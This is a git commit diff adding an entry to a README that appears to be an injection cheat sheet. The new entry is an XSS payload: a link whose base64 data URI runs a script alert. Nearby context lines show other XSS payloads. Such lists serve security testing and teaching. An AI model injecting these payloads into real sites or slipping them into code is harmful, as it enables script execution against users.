XSS using base64 encoded href data in a link

2024-12-19 02:46:10 +00:00 · 2019-01-10 18:24:43 +01:00 · 2019-01-10 18:24:43 +01:00 · c7a292c19d
commit c7a292c19d
parent ea0bddc18a
1 changed files with 7 additions and 1 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -162,6 +162,12 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```

+XSS using base64 encoded href data in a link
+
+```
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
+```
+
 ## XSS in wrappers javascript and data URI

 XSS with javascript: